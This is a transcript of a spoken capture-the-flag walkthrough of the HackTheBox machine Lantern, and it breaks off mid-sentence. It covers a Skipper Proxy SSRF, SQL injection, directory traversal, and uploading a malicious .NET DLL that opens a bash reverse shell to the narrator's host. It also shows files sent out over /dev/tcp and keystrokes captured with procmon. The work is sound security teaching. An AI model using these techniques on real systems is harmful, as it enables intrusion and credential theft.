What's going on YouTube? This is IppSec, and we'll be doing Lantern from HackTheBox, which starts out with a server-side request forgery and a web server, which is Skipper Proxy. We can use this to enumerate ports listening on localhost and discover an internal app is listening on port 5000, and this app is vulnerable to SQL injection. We can dump the SQLite Database in order to get credentials, but if this wasn't vulnerable to SQL injection, the app is coded in Blazor and loading a DLL directly, so instead of doing the SQL injection, we could also just extract it from the DLL itself. Anyways, this credential gives us access to another Blazor app, which has two vulnerabilities. The first is a directory traversal with file upload, which is important because there's another endpoint that will load DLLs. So we can use this to load a malicious DLL and get onto the box. The privask allows us to run Procmon with sudo, and we can use that to examine the right syscall nano is doing and obtain a password which is being typed in. So with that being said, let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv, enumerate versions, -vv for double verbose. This gives us things like the TTL, OA, output all formats, put in the nmap directory and call it lantern, then the IP address of 10.10.11.29. This can take some time to run, so I've already ran it. Looking at the results, we can see 3 ports are open, the first one being SSH on port 22, and the banner tells us it's an Ubuntu server. The next thing we have is HTTP on port 80, and the banner tells us it's Skipper Proxy, which that's a new one. The default page looks like it's a 404. We got a request not found. And then looking down, based upon this error message, I know this is going to be a Flask web server just because the two things I look at Flask is this string and then also the doc type HTML with HTML lang equals en. Those are the two things I remember most about Flask, right? But if you ever want to know about 404 error pages, OXDF has put something on his blog. If you just Google 404 OXDF, it'll probably come to this default 404 pages, and then you can take a look at exactly what each 404 looks like. If we look at Flask here, you can see the source and then why it says that he points it out in the source code here. So we know the web server on port 80 is probably going to be Flask. It's odd that the server is Skipper Proxy, but let's keep moving on to see what else we have. Let's look at port 3000. This doesn't flag it correctly. It doesn't know exactly what this is, but based upon this, we know it's going to be HTTP because it's giving us a 500 error. And this one says the server is Kestrel. So we have Skipper Proxy and Kestrel. Looking at the other things, this definitely looks like a .NET with the system.uri format exception, things like this. So I'm going to guess this is, oh, yep, Microsoft ASP.NET Core. So this is definitely going to be some type of .NET application. And that's about it, all we see. So let's go take a look at the websites. So I'm going to go to HTTP 10.10.11.29, and we also have to add lantern.htb into our host file. I want to say it was redirecting us right here. I just forgot to call it out, but it does send a redirect. So let's add that into our host file. So sudo v etc host, and then we can add 10.10.11.29 lantern.htb, save this, and we'll just go here. It'll redirect us to lantern.htb, and we get the page. So let's see, we got the best IT solutions. We are creative. And then all our services, about company, portfolio, testimonials. So let's go to about us. So it looks like the same page, portfolio. So this all looks like the same page. Let's go to vacancies, join our team. We offer, and we got a submission form here. So let's see if we can do anything here. So root at ipsec.rocks, select vacancy. Let's select that. And then we want to choose a resume. I'm just going to upload the README because it's a quick thing to click, and I just want to see exactly if this upload form works or not. So I'm going to send it through BurpSuite, click upload, and send it over to the repeater tab. And it says only PDF files are accepted. So let's see exactly how it's identifying if it's a PDF. The first thing I guess is probably going to be the extension. So we can put .pdf, and we see, thank you, we will contact you very soon. So we can upload PDF files. It doesn't really help us all that much. It is Python. Right there, I was just checking for directory traversal. But if we upload files, Python doesn't have a direct way to execute it. Normally, like PHP, you can normally find like an include statement and then chain it. But I don't see too much here. I wonder if it's just checking if PDF is in the name. We could do like .pdf.php to see that, and it has to end in PDF. So let's kind of move on. The next thing I would look at is exactly how that gets uploaded. So maybe there's like a uploads directory, so we can try /uploads. We have to turn intercept off, so we can do that. Not found. We could try upload. Not found. So I don't know exactly where it's getting uploaded. We did give it a file name of readme.license.pdf, so we could just try accessing it, and we can't get to it. So I'm not sure exactly where to go from there, but we had a second port open. So let's take a look at this port. This is the .NET one. Remember, it's had the Kestrel web server. So if we go here, we see attempting to connect, and we get a login page. And if we look at the source code, let's do Control U. Let's see. We can see this is going to be a Blazor WebAssembly type of thing. So it's a little bit hard to analyze. We could just try like default credentials of admin, click login, wrong credentials. We can look at exactly how Burp loads this page. So if I go to, let's go target here, Blazor. I'm looking to see if there's like any DLLs loaded. So if we had full out DLLs, we could easily just download them and decompile, but I don't see too much here. So I want to look at the actual server headers, right? We have Kestrel web server, and we also had Skipper Proxy. So I'm going to take a look if there's any vulnerabilities in these. So if we just Google Skipper Proxy, maybe CVE is a good thing to add. We can see there's a server-side request forgery. So clicking on this exploit to see exactly how the server-side request forgery works, it says we just add the header Skipper Proxy to a request, and then here they're accessing the AWS metadata path, right? So on a lot of like AWS servers, if some legacy thing is enabled, the local host will be able to access the security credentials file. So we can try adding the Skipper Proxy and seeing if we can make this connect back to us. So I'm seeing if it makes it connect back to us because I wonder if it's vulnerable or not. We don't know how to disclose the version of Skipper Proxy. So if we just set like the proxy to be localhost, and we don't know if it's exactly working or not. But if we set the proxy to be us and the server reaches out to connect back to us, then we know it is running a vulnerable version of the Skipper Proxy. So that is my thought right now. So I'm going to do a curl HTTP 10.10.11.29, and we can just specify the host header of X Skipper Proxy. And then, oh, I already had that in my clipboard. We'll do HTTP 10.10.14.8, port 9001. And then let's listen here. And we see the server makes a request to us. So we do have a proxy here. So we can trick the Skipper Proxy into connecting to an HTTP proxy, it looks like. So with that, what I want to do is attempt to fuzz local ports on the box. So let's go over into Repeater tab. And I just want to do a simple GET request. So let's go back to the target. We can just intercept this one. And let's add that proxy header. And let's do HTTP 127.0.0.1 and see if this works. It looks like it does. So what I want to do is see if we can enumerate ports. I'm going to do port 22 and see if the response changes. We get internal server error. Port 23, service unavailable. And I did those two ports because we know this is a port that's just open on the box. It's SSH. And we see 500 and this 503 if the port isn't listening. So my guess here is we can attempt to enumerate local ports on this box to see if there's anything listening on localhost. And we maybe will get to additional services. So I'm going to do a capital fuzz here because I want to send this to FFUF. So I'm going to copy this request to a file. So we can just say copy to file. I'm going to do skipper.request. And then let's do FFUF dash request skipper.request dash request dash proto HTTP. And the word list, I'm just going to do sec 1 through 65,535, so we can search all the ports. And if you don't know what I just did there with this query, it's very much like the dollar and then parentheses that runs a command, but this one runs a command, puts it to a temporary file. So this is just a quick way to make a word list of 1 through 65,535, which is all the ports. So we can see port 22 is open, 80 is open, 3000 is open. We knew all those ports are open, so this isn't too interesting. We also got port 5000, so that's a new one. So let's see what happens if we hit that. So let's go back to burp. We can say port 5000, and we get internal lantern. So this looks like it's Blazor, but I don't think the other login had internal in it, did it? Let's look at the source internal. So this definitely looks like it is different. So we want to make a request to port 5000, make a request to localhost 5000. And to do that, we have to add it to the header. You can either go to like get a plugin from Firefox or Chrome that allows you to edit the header, but I like just doing it in BurpSuite. So we go to the proxy tab, go to proxy settings, and then we can go to match and replace, and then add. And the type is going to be request header. We're not going to match anything. It says leave blank to add a new one, and we can replace it with something. So we can do x Skipper Proxy. And then we can do HTTP 127.0.0.1 port 5000. And I'm just going to label this Skipper Proxy Lantern, I guess. Click OK. So now all the requests going through Burp will get this automatically added. We have to remember that because sometimes when you add headers, it can break trying to access other websites. And it doesn't always become obvious that's the culprit. So just always remember when you create those rules because odd things can happen, right? So now if I refresh this page, it's going to make a request to localhost 5000 instead. So we can see right here, an unhandled error has occurred. Attempt to reload. I don't know exactly what this error is. I wonder if it's how we did something. It's attempting to load. Let's see if we get that error message again. I'm going to go into BurpSuite, look at the HTTP history, see what's happening. Not sure. So it is loading things. We just loaded DB storage. And here we have a page. So looking at this, we have employee information. And let's see, enter this. So let's do, we'll add IPsec. I'm going to test for like cross-site scripting. Additional, please subscribe. And I'll put a single quote there. We can do a double quote here. Add employee. And it adds it. Everything looks to be fine. I don't see where please subscribe went. That was additional information. And that isn't being displayed here in this chart. Let's see. Go here. Yeah, that is not being displayed at all. Let's go to vacancies. Nothing interesting there. If we go to book vacation, we can enter employee ID. So if we do 1, employee not found. If we go back to home, we can get all our information. So I'm going to go copy this ID, book, search, and we get information here. So if we do a single quote, we get a SQLite error, unrecognized tokens. So I'm going to put a comment after this and then click search, and we have it. So we have pretty much verified there is SQL injection here, right? So if we do or 1 equals 1, click search, that looks like it's still getting IPsec. Let's do limit 1. We get the first one. So we can 100% verify we have SQL injection here. So what we want to do is dump the database. So let's try getting it into BurpSuite real quick. Let's see, click search. Nothing's going. Search. Okay. Click on network tab, reload the page. Because it doesn't look like we're actually having anything. So this will be more concrete if anything's going on. We can see it is Blazor, so it is loading all these DLLs. It is a WebAssembly app. So there is a chance it just loads the database locally in our browser, and we may not need to do SQL injection at all. We see that Blazor.dll. I'm guessing that's going to be the unique one here. All these other ones are Microsoft, right? But we'll explore like downloading the source code after we play with this SQL injection. So we'll add this, and then let's see, what do we want to do? Oh, shoot. I wanted to, I'm guessing nothing extra appears, right? So this is probably querying it locally. We'll verify that after we exploit this. So we want to do a union select one, which so right now we're enumerating how many columns this is. So let's do 2. Then let's do 3. There we go. So we know this is going to be 3 columns. If we do 4, we get an error. So now we want to see where the data is. So if I edit 1, let's do please sub. Input string is not in the correct format. So I wonder if that has to be an integer. That's weird. Maybe that has to be an ID, right? Name. Oh. Wait, what? So when this works, and then I put 1 to be a string, then we just see these select 2 and 3. That is bizarre. I guess it's how it's like viewing the data. Maybe putting this in string puts this as the last line, and then the last line gets shown here. If I change the ID to something that does not exist, then we'll always see what a union select is, right? So if I go back to 1, 2, 3, I will just see this because the union's putting the query in place, right? When it was there before, it's probably only showing the top or last row, right? So even though we have this, I wonder if I do 99. So it's probably only showing the last row, right? So let's see, we want to put data here. So if I put please subscribe, then we can get the name as please subscribe. And the next thing I'm going to do is see if we can do a subquery. So I'm going to put parentheses and then just do select please subscribe. And I like doing subqueries and union injections because I just find it easier to comprehend. And this works, right? The other way we could do is put columns here, like please subscribe, and at the end do a from and say what table we're getting it from. But I find subqueries to be easier to read. So let's do select. And what do we want for SQLite? I want to say it's SQL from SQLite. Is it underscore master like this? Yes, it is. So this is going to be the SQL table. So if I copy this, let's go here. We'll call this internal lantern.db, I guess. And let's see. That's create table. Let's look at the other create. Is there any other table? Looks like I just have one table. Oh, there could be multiple rows because we're only grabbing the last row, right? So we can do a group concat. I don't know if it's underscore or not. There we go. So this is getting a second table here. So we got 2 tables. We got the sequence table as well. So let's see. We want to probably view internal info because even though we created our employee, when we created it, we didn't have any internal info. So the home page isn't showing us this field. So let's see exactly what is in this field. So I'm going to do a select. We can say internal info. And I also want to get the username. We want that group underscore concat. Let's see, can we make this bigger? There we go. So I'm going to do, I think it's just name, right? Let's see, name text. So we'll do name, comma, I think it's a comma, or plus. I know, let's see, let's do comma. I think this is concatenate, the double thing. And then semicolon. Internal info. And then from, instead of SQLite, let's do employees. I think this is wrong how I have it. I think I need commas. No such column, internal info. Nope, we don't need commas. So we do name, and this double bracket is append. So let's also append a new line. And that did not work. We have the data here. So let's just copy this. So I'm going to copy all this field, and go here. And then let's see, v, let's do internal lantern.dump, paste this, and then we'll search for \n, and let's replace it with a line break. We probably want to break it with a carriage return. \r instead. There we go. And we can get rid of the commas here. So now we have the internal info page, and we can see for Travis, who is a system administrator, first day, and we have credentials right here. So let's see if we can log in with this on port, was it 3000? So let's cat this internal lantern dump, grab this credential, and attempt to log into port 3000. Let's reload the page, I guess. Let's do admin, log in. And awesome, we can get in. But I want to take a step back real quick, because when we're looking at port 5000, right, when we're doing that SQL, we weren't sending any data back and forth to the server, right? Which indicates, let's see, we just did a slash because we have the Skipper Proxy directing us here, which indicates since when we were doing those SQL queries, since we weren't just sending data to the server, it was loaded in a browser just hidden somewhere, right? So if we look at BurpSuite, let's go back to the target tab, and then let's go lantern. Let's see, we have vacancies, the framework. It's not showing any data here. I'm guessing that's because the filter by MIME type. Let's see. Framework. There we go. So we want to grab this DLL, internal lantern.dll, because that one looks to be unique to this app, right? So let's download this file. Let's see. It's not modified. Let's say get rid of this cache. Repeater. Get rid of caching. Send the request. It does give it. So we can now copy the file. I'm going to call this what? Internal lantern.dll. Save it. Okay. Internal lantern.dll. That's just data because we have the HTTP header. So if I delete the header, now we just have a .NET assembly. So let's go ahead and decompile this with ILSpy. And if you don't have ILSpy, I would recommend watching the Blazorize video, because that's where we actually download this copy that works on Linux. I don't know exactly the Git repo off the top of my head. If we look at ILSpy, Git branch, yeah, I don't have it as the Git repo. So I would definitely recommend watching the Blazorize video, because that's where we go ahead and download this. So let's do open, and then we want to go, what is it? HTTP lantern. It does not look like it wants to load there. Let's do IPsec. Then where's HTTP? There we go. Lantern. Load this. And for some reason, ILSpy doesn't do the best of job at this. We see it is version 6.0 of .NET, which will become important later, but a lot of this code just doesn't show up in the GUI. If we used .peek from JetBrains, it does a much better job in terms of the GUI, but also for some reason, if we just right-click Save Code, and we save it, it does a better job. I don't know what the difference between viewing in this GUI and save code is, but yeah, let's just save it. There's no new folder button, so let's create one. Let's do make dir internal lantern. Can we refresh this folder? And then let's save it here. We can go in here, and then we just have one file. I'm going to move it to .cs because that's what I'm assuming it is. And then if we look at it, we see the decompiled output, and there is much more information here. So we have task main, build render tree, let's see, components base. So if we look at this on this task on initialized async, we can see it is doing like a database migration or something, like loading a SQLite database in memory here. And we have all the information of each user. So we have the UID, internal info, employee, internal info. So we have all that data here. If we wanted to, we could just grab this out of the file and then base64 decode it. Do we have? We don't have mine. So maybe, I don't know exactly how it loads. I bet that DB storage updates it. So I was thinking like this DLL just gets updated on the server, but it doesn't fully make sense to me because I created my user. I exist in this database, but I'm not seeing it here. So this is definitely just some migration data that probably shouldn't be in the DLL to begin with. It's not 100% clear to me exactly how it's refreshing the data because obviously IPsec exists here. So I'm guessing that db storage.javascript is like refreshing the database and pulling updated queries. And if we like extracted the browser memory, we'd find it. I'm not sure how to do that, but if we grep for, was it internal info? Hopefully I have that. There we go. Let's do a awk field separator on single quote and then print 2. I'm guessing we can get all the base64 this way. Looks like we do. Base64 decode. And that's another way we can get it. So we can see we have all the data here. He has initial credentials, admin, and this. So yeah, let's now go back to us logging into the app and see what happens. Reload. Oh, this is going to be annoying. Okay. The app does like logging you out. So you definitely want to save that password. So I'm going to echo this to PW. Just in case I need to grab the password again, we can do it quickly. So looking at this, we have the admin dashboard, it's logs, and we have HTTP request here. If we escape backwards, we can see there's other modules we can load. So we have file upload, file tree, logs, health check, upload. I'm seeing if there's anything else. If we do R, we get resumes. So we can definitely see which modules. It looks like they match kind of the components here. So if I click on files, we can see all the files. So we have like app.py, and this looks like it's the source code to the main web page that we saw. So looking through this, we have a route that we didn't see, the privacy and policy route. And what this is doing, let's see, I'm just going to copy this so we can view it in a text editor. Okay, I'm going to make dir flask cd flask v app.py. Paste this. There we go. So we can see it gets 2 arguments, language and extension or ext. And then we attempt to send the file, var www sites localization, and then language file extension. There's no sanitization happening right here. So that means we can probably exploit a directory traversal. So we'll probably set language to be a bunch of ... slashes and then file extension to be something, because it's going to change this filter to be ... slash. And then the code puts a period here. So if we start putting the extension and begin it with a slash, then we went up directories, This is the current working directory, and then we could go like etc passwd and get a file like that. So it's probably vulnerable to a file disclosure. We can test it out pretty quickly, I think. So we're going to go privacy and policy on /. So if we do privacy and policy, and we can get rid of the Skipper proxy. If we requested it in our browser and didn't get rid of it adding the header, it wouldn't work because we'd be going to the Blazor page. So that's what I meant about it not always being obvious and always having to remember you did that. So let's put a bunch of //. We could count how many directories we need. So we only need 4 of them, but for Python, it doesn't really matter. We can do and extension is equal to, then we add a // so that now we're in the root. Let's do etc passwd. And that did not work. Let's see. Oh, it's only lang, not language. There we go. And we got the passwd file. So we have a way to disclose files. I don't know exactly how that helps us yet. We could look and see if there's any type of config we're loading. And I don't see any config file here. And maybe there's a oh, I don't know why I didn't save that. Oh, well. Maybe there's a config file in a different component now that we can read, right? So we only see lantern.htb here, but maybe we can go sites and then internal lantern and get a config out of that. So that's a possibility that I'm thinking of for this file disclosure, but let's see what else we can do. If we go to upload content, we have an upload directory, custom avatar, and then we can browse. So let's upload a license again. And we have just uploaded to the static images. So if I go back here, we can see README license has been uploaded. Let's now attempt to upload with directory traversal. So let's go in BurpSuite. We can do proxy intercept on, do this. And that is sending a WebSocket request. And if we do this forward, we get some weird type of error. And this is most likely because we broke the message pack parsing because we just added to the length of a string, right? And it's a binary protocol. So before that string exists, there's probably a number that says how long to read. So because we added probably 6 characters there, it cut 6 bytes early and then didn't read the end of the JSON, which was the double quote squirrely bracket. So that's why it errored there. So let's try this again. It's attempting to reconnect. I bet we're going to have to attempt to log in again. Let's see. Yes, it does want us to log in. So let's do admin and then cat pw, grab this password. Remember, the remember me does not work if I remember correctly. We can just save the password there, right? There we go. So let's go back to uploads, intercept on. Let's go back to README. And we're going to have to edit this. So let's go to extensions, add, nope, I want to go to the B App Store actually. And if we search for Blazor, we have this Blazor Traffic Processor. So let's install this. And now we have this BTP tab. So we can now send this over, and this gives us JSON. And if we add the .. then copy this, tell it to go JSON to Blazor, it's going to update everything. We can go back to the proxy, paste this, forward the request, and this, we didn't get an error, right? It says it's uploading. I wonder if it uploaded. Let's go to files. Let's see. I don't see README. There is a README license up one directory from images. So I think when it logged me out, it probably deleted all the content. Let's just try this real quick. I'm not going to intercept it. I just want it to upload. Go to files. Yes. So we have directory traversal with uploads. So now we found both a file disclosure and a way to upload files. Let's see what else we have. If we go to admin dashboard, it looks normal. Uploaded resumes, we see this. This is probably us uploading the resume from the Python application. So let's see, if we go choose a module, let's choose a module that doesn't exist. So we can do please subscribe, and then I guess click search. And we see an error occurred. Could not load file or assembly. Opt components, please subscribe.dll. So it's appending DLL to this. Let's try .. to see if we can go in any directory. And we add .. it says unexpected path. So we have to drop a file into opt components, and it has to be a DLL. And it looks like all the DLLs, like if I type logs here, it loaded the DLL. I'm guessing that's in opt components. So what I want to do is use that file disclosure and download this logs.dll. And then we can see how it exists and see if we can upload a different DLL and get code execution, right? Because it appears just to be loading this DLL on the server. And there we go. We have copied the DLL. So let's copy this to file, and I'm going to call this logs.dll, save it. And then just like last time, we want to remove the header. And then we can go back to ILSpy. We can do file open. And I wish it remembered my home directory. This is always annoying. Home, ipsec, hdb, lantern, logs.dll. And let's export this to a file. So save code. Oh God, home, ipsec, hdb, lantern. And we'll just call it logs. It'll save as logs. We can move logs to logs.cs. And if we look at it, we can see exactly how this works. So we have a lot of assembly information right at the top. Let's see. Right here, it's building that web form. There's probably like a GUI or something to add all these attributes. I don't know exactly how Blazor works, but I can't imagine someone going and hand jamming all these values, right? It's probably some type of web GUI, like I'm thinking Visual Basic, where you just drag and drop the button you want, and it creates all this for you. But we can see this is probably going to be the button because we see on click. And if we went back to the page, it's attempting to reconnect, but we got the application button there. So there's probably a way to switch logs. So this is building the web form. Then we have a read log function. So file text, I'm guessing that's going to be this box. So it clears that box, checks if it exists, and then reads it into that box, and then puts file text.add. This is probably changing the button. So if we click on application, it changes it to access maybe, right? And then on initialize, we have read log. So what we want to do is edit this file, and instead of it doing read log, we're going to have it run a command for us, right? So let's, we have to make a .NET application so we can compile this. So I'm going to do a .NET new class lib, because that's a DLL. We'll name this exploit. And if you don't have the .NET, let's see, dpackage-l grep, I think it's like .NET-SDK. These are things I have, so you can probably do .NET-SDK. You probably want 6.0 for this because when I look at the decompiled output, a lot of it said 6.0. I have 7.0 here. I don't know if that's going to be an issue. But let's go into what it created, and we have this class1.cs, which is blank, right? So I'm going to copy the logs.cs over top of class1. And now we want to change the namespace. So let's see the namespace of logs. We want to change it to exploit because that's what we created. And I think it is case sensitive. And when we did the .NET create, we did it a lowercase, right? .NET new, yeah. We probably should have done uppercase because normally namespaces begin with that, but I don't think it'll matter that much. So let's open this in Visual Studio Code. And we also want to try to build it. So if we do .NET build, C release, let's see. We'll probably have to add some type of components here. So it's checking. Up to date. I didn't expect it to take this long. I guess my computer's going slow because it's loading stuff. Let's see. Yeah, we have a bunch of errors. So it can't find a lot of namespaces. And if we Google a lot of these errors, it would tell us to put a generate assembly info false into our CS project. So I'm just going to put that here. So generate assembly info false. I don't know if I want to put this in or try to work without it. So a lot of that error is coming from our code having all of this, right? I think. I wonder if we just get rid of this. I'm going to try that actually. We can get rid of that. Exploit, component base, build render. That looks fine. Let's get rid of this generate assembly info, save, run the build again. It should go quicker now. Let's see. So we need the ASP.NET core base. So we don't have the namespace Microsoft. So if we Googled this, we'd come to like .NET add package, and then it's what? Microsoft ASP.NET core components. And we just deleted the info, but it was version 6.0.0. Let's see, does that add? It does. And then we also want to add the web components. So this is just adding the packages. So we have now the item groups. Oh, this is what we added, right? So we build release. Let's see. And it looks like we can build. Awesome. So our exploit right now isn't doing anything different than logs. If we upload it to the box, we could verify it works. But let's see if we can run a command. So I'm going to go here and on initialized, let's do a file text.clear. Then we want to let's do process, new process, start info. The file name, we don't want sudo. Let's do bin bash. Start arguments. I guess it's pulling that from where it's reading logs from. We'll do -c. And let's see. We can do bash-i dev tcp 10.10.14.8 9001 0 and 1. And I just realized I forgot something. I think it's like that. That looks good. See, how do we comment? Is it that? Let's chain this up real quick because the reverse shell is somewhat complicated, right? So let's just do a who am I first. So do start info arguments like that. Redirect standard output. Yes. Use shell execute. I don't know exactly what that is. Start. Let's see. Read to end. There we go. And I think that's it. So GitHub Copilot pretty much did that for me once I started typing process, right? So what we're doing here is we're clearing the output, running the process. Do we have to do a wait? I think we have to process wait for exit. Because when we start this, it just starts the process. I don't know if this like read to end, that actually probably waits for the exit, right? I don't know. But here we're going to wait for the process to exit, and then we're going to read standard output, and then we're going to add it back into the file text. So let's save this. And then We can do the .NET build, release. So now we have a DLL, and we want to upload this. So let's go back to BurpSuite. We can turn intercept off. I know I'm going to have to log back into this application, so I'm just going to get this password on my clipboard. Retry, reload. And let's see. Let's connect. I do not know why it's, there we go. Admin. Oh, I had my browser save the password. That's right. So now we log in. We want to upload content. This is where we turn BurpSuite intercept on, browse. We want to go into our directory. So HTB. Then the box name is lantern. We called it exploit, bin, release, net, exploit DLL. My intercept is on, right? It is. There we go. And oddly, it's a web request now when before it was a WebSocket. But okay. We will deserialize. Now we want to escape all the way up. So we should be en route by now. We can say opt components, exploit DLL, paste this back, JSON to Blazor, copy, go back to proxy, edit this line, paste, forward. It looks like it's accept because we didn't error right away. Success. And if I now do exploit and search, unhandled exception. Uh-oh. I wonder if our DLL is bad. Because looks like we crashed the server when we tried to load exploit. We do search. I was really expecting to see data here. See browser dev tools for details. Console. Let's see. Object reference not set. Could not load assembly. System runtime version 7. So we want to change our runtime. So let's go exploit csproj net. Let's change this to 6.0. That looks to be better. Build release. Hopefully it still compiles. It looks like it does. And I don't know if the exploit itself will, or the upload will upload the file even if it exists. So this part could be slightly a pain, having to redo it. Reload. So it looks like when we cause this error, we actually have to reload the application. So let's do admin. Password should be saved, right? Yep. Login. Upload content. Browse. Exploit. It may also be worth like scripting this out because this is a pain to have to do every time. Add a bunch of these. Opt components. Serialize. Copy. Paste. Forward. File already exist. That's what I was afraid of. I wonder if we can call it like exploit 2. Let's try that real quick. I'm going to be lazy and we'll call it like this. This may actually work because we didn't change the length of the string. File may have changed. I don't know what just happened there. I'm guessing we can't just change that. There's probably other thing with like the state, like the ID here needs to change as well. I'm guessing we had like ID 2 last time. Looking here, that's probably ID 2 or something. So Yeah, that's probably the issue. Blazor to JSON. Put all these. Opt components. Exploit 2. There's got to be a better way to do this. Paste. Forward. Okay. Exploit 2. Search. So that's not working because now we have to change the namespace to be accurate, I think. Okay, let's see if this works. File upload. Let's see. Copy. Paste. Opt components. Exploit 2 is what we called it, right? Yes. JSON Blazor. Copy. Hopefully I have to rebuild the project because that's going to be a pain. Oh, the file already existed. Oh my God. I'm just going to call this run CMD. And let's see. Does the CS project have exploit in it at all? It does not. Let's see. Bin release. Project assets JSON exploit. Let's see. So namespace. Wonder if I need to update this. I don't know. Let's just build it again. Okay. Bin release net 6.0. Move. We're going to change exploit DLL to run CMD DLL and hope this works. Oh, we were even trying to upload the .NET 7.0 still. So even if it was working, we get a failure eventually. So copy, Blazor. Whoops. We want to do ... slashes. Opt components. JSON Blazor. There we go. Forward. It just said delete. We had some type of error. I probably should just start with the reverse shell because I don't want to get this working twice because this is becoming more of a pain than I expected. So we're going to give this run CMD thing one more time, and then I'm going to change it to a reverse shell just so we don't have to do it twice in a row. But I really wanted to show it working. Run CMD. Copy. I deleted what I copied. Copy. There we go. Blazor. Bunch of ... slashes. Opt components. Copy this. JSON. Paste. Forward. Okay, that one did not have a delete, so we have uploaded it. And I really hope when I click search here, could not find type run cmd.component. Let's see. I'm really guessing that's because of the namespace, which is annoying. But let's try doing this again real quick. So we do .NET new class lib -n. I'm going to call it rev shell. We have created this. Let's go in rev shell, edit the CS project. We want to change this to be net 6.0. Then I'm going to copy the class here. We're going to edit run cmd. I'm going to call this rev shell. And let's see. I thought oh. I don't know why the arguments was way down there. --i. That looks fine. Okay. Try and think what we have to do. We have to add the packages. So add the components web package. And then we also want to add just the regular components. And that should be good. So let's do .NET build C release. Go back here, upload content. Lantern rev shell. Bin release 6.0. I'm really hoping this just magically works. Paste it. Blazor. Let's do a bunch of dot slashes. Opt components. JSON serial. There we go. Forward. Okay, we have uploaded the file. NC LVNP 9001. Rev shell. Let's load this module. Awesome, we have it. So if I had created the namespace, put that class in, and had the code execution working the first time, it probably would have worked. The error I think I just ran into before I got that working when I, let's see, went into exploit is I think there was some .NET like properties that got compiled into the binary that still had exploit. We may be able to verify that if we do net 6.0 strings run grep-i. Does exploit exist here? Yeah. So there were still references to exploit, and I think that's why it failed. So you want everything working in the DLL the very first time. I don't know exactly how to change the namespace once it's created. I'm sure if you went to ChatGPT, it would give you a .NET command to change the namespace, and then it would just all work. But I'll leave that up as an exercise for you. If it had worked as intended, this like text box would be erased, and you would just have the output of your command right here. So let's go back to the box. Let's enter a Python command, import pty spawn bin bash, stty raw minus echo foreground. And then we can export term is equal to xterm so we can clear the screen. And now let's see what we have here. So in Lantern admin, we have this app.razor. If I cat this, I don't see, let's see, grep-ri. I'm looking for like password, right? I was saying how what the MySQL password is. The login looks like it's hard-coded, which is a bit odd. Just username admin, password is equal to this. So maybe there is no actual database. So if we go up one directory, we have user.txt. Maybe it's an opt, build components, sysinternals. Don't know what that is. So maybe var dub. I was looking for other web apps, right? So if we go to sites, there we go, internal lantern. Look for password here. It occurs in a lot. Let's do less capital S. A lot of errors. Let's hide error messages. And I think my terminal kind of died. Temp WASM, prod configuration. Okay, sensitive. Let's see. Let's just see if we can get an SSH shell, because that'd be quicker than fixing up our terminal. It looks like we do have an IDRSA key. So let's copy this. And we'll SSH into the box. Okay. V Thomas. Wrong clipboard. There we go. chmod 600 sh-i at, what was it, 10.10.11.29. There we go. So internal grep dash ri password dev null less capital S. Okay, so it did not print any better, but we have this JSON file. So if I cat the JSON file, that is huge. JQ dot. Let's send this over to our box. We'll call this Razor JSON dev TCP 10.10.14.8 9001. Okay. JQ dot grep dash I password, and it exists everywhere. Wow. MySQL. Oh, it's a SQLite database. It wasn't MySQL. Let's see. CD data. Find dot dash name star.db. I don't know what that SQLite database is. DB storage. File data.bin. What is this? I have no idea what that data.bin is. Let's see. But it looks like all that's irrelevant. I can't really find any SQLite database or passwords in these configs, but we can see our user can run the command procmon as root. So I'm guessing that's going to be the path. So let's take a look at exactly what processes are running. So I'm going to do a ps-ef forest so we can see all the processes, and we only really care about processes running as users that's not us. So I'm going to also add a grep-v Thomas and see what we have. And this one is probably going to be the most interesting right now. So we have expect running a script bot.exp, and then that's running automation.sh. We have Skipper accessing things, and then a bunch of data, right? Or files. But we can run Procmon on automation.sh, and that's going to enable us to like examine syscalls that are running, and we can pretty much rebuild the output that's going off of automation.sh. There is also something, I bet if we ran like linps, it would point out Thomas has mail. So if we look at our mail, right, we could see a message from HR that says, congratulations and welcome to joining. Our admin is automating a process. Could you check his work in root automation.sh? So that kind of matches with this, right? So let's run Procmon against this PID. So let's do sudo procmon-h -p 2921, because that's going to be Nano's PID. And we can see, well, that output is horrible. We got write operations poll. Why is this? Let's see. If I change my profile, let's go to chainsaw. That's still bad. There we go. I know that's a lot harder to read, but man, well, this text size makes it hard to read, but at least you can see the data. So you can see operation write, poll, write, and I want to log all these write operations. So if we do -h again, we can specify -e write, and this is only going to show us the write operations. And this is going to be nano writing to the screen. So we see buffer 1B, 5B, 3F, 32, 35, 68. So if we wanted to, we could probably go, I'm just going to use CyberChef. I know we could easily use Python, but sometimes I do like just taking the GUI route and using a tool like CyberChef, just in case we have to do other encoding, things like that. Makes it a bit quicker, right? So let's say 1B, 5B, 3F, 32, 3F, 32, 3568. Okay. Say from hex, and we see it's printing data. And this is going to be a ANSI escape thing. I think this means show the cursor. Let's see. ANSI escape sequence. Escape codes. Let's see. What was it? !25. ANSI escape sequence. Let's add 25H. So 25H is used to show the cursor. 25L would be used to hide it, I think. But we can see the data does change. So it's mainly the last character. So we 1B, 5B, 3F, 32. We see that the same, but we see 6C, 6.8, 6C, 6.8. So that is changing. We also have 33, 77. So we have data being written. What we want to do is more programmatically parse this data, I guess, because copying and pasting out of the terminal is going to be a big pain. So if we specify -c, we can write it to a file path. And I think if we look, Nano's probably changed the PID. Now Nano's running as 3311. So what I want to do is replace this. I'll just do a pgrep on Nano. And we want to say collect. I'm going to call this nano.db. And now the file is going to output into a SQLite database. And I'm going to wait till it has like 250 events, and then we'll copy it back to our host. And this database is still a little bit confusing. And I don't fully understand it, but we'll try to explain what I can understand. So I'm going to Control-C. We have 250 events. That should be good. Let's get this over to our box. So I'm going to do nc-lvnp 9001. I'm going to call it nano.db. We can cat this file to dev tcp 10.10.14.8 9001. And then let's do SQLite 3 nanodb.dump. And we can see all the data in this. And the columns, let's see. Let's just do less. So we have eBPF data. So the first column is going to be the PID. So PID 3311. Then we have the syscall, so which is going to be right. That's going to be labeled stack trace. Then we have com, which will probably be, let's see, probably the process name. Com, and I don't know the difference between com and process name. Result code. Then we have a timestamp. Then the syscall, duration, and then arguments is a blob. And that blob is going to be this hex. So right here is the result code. This is timestamp. That's duration. So the result code for write is normally how many bytes it wrote to the register. I bet if we went to, let's see, write syscall, maybe this will pull it up. Let's see, what are the outputs? Linux syscall table. This may be better. Filter for, we can just click on write. No. We do entry point. This is not what I was expecting. I was hoping to just see all the parameters. Let's see, maybe it's the Chromium. Okay. So write, we have a file descriptor, then the buffer, and then the 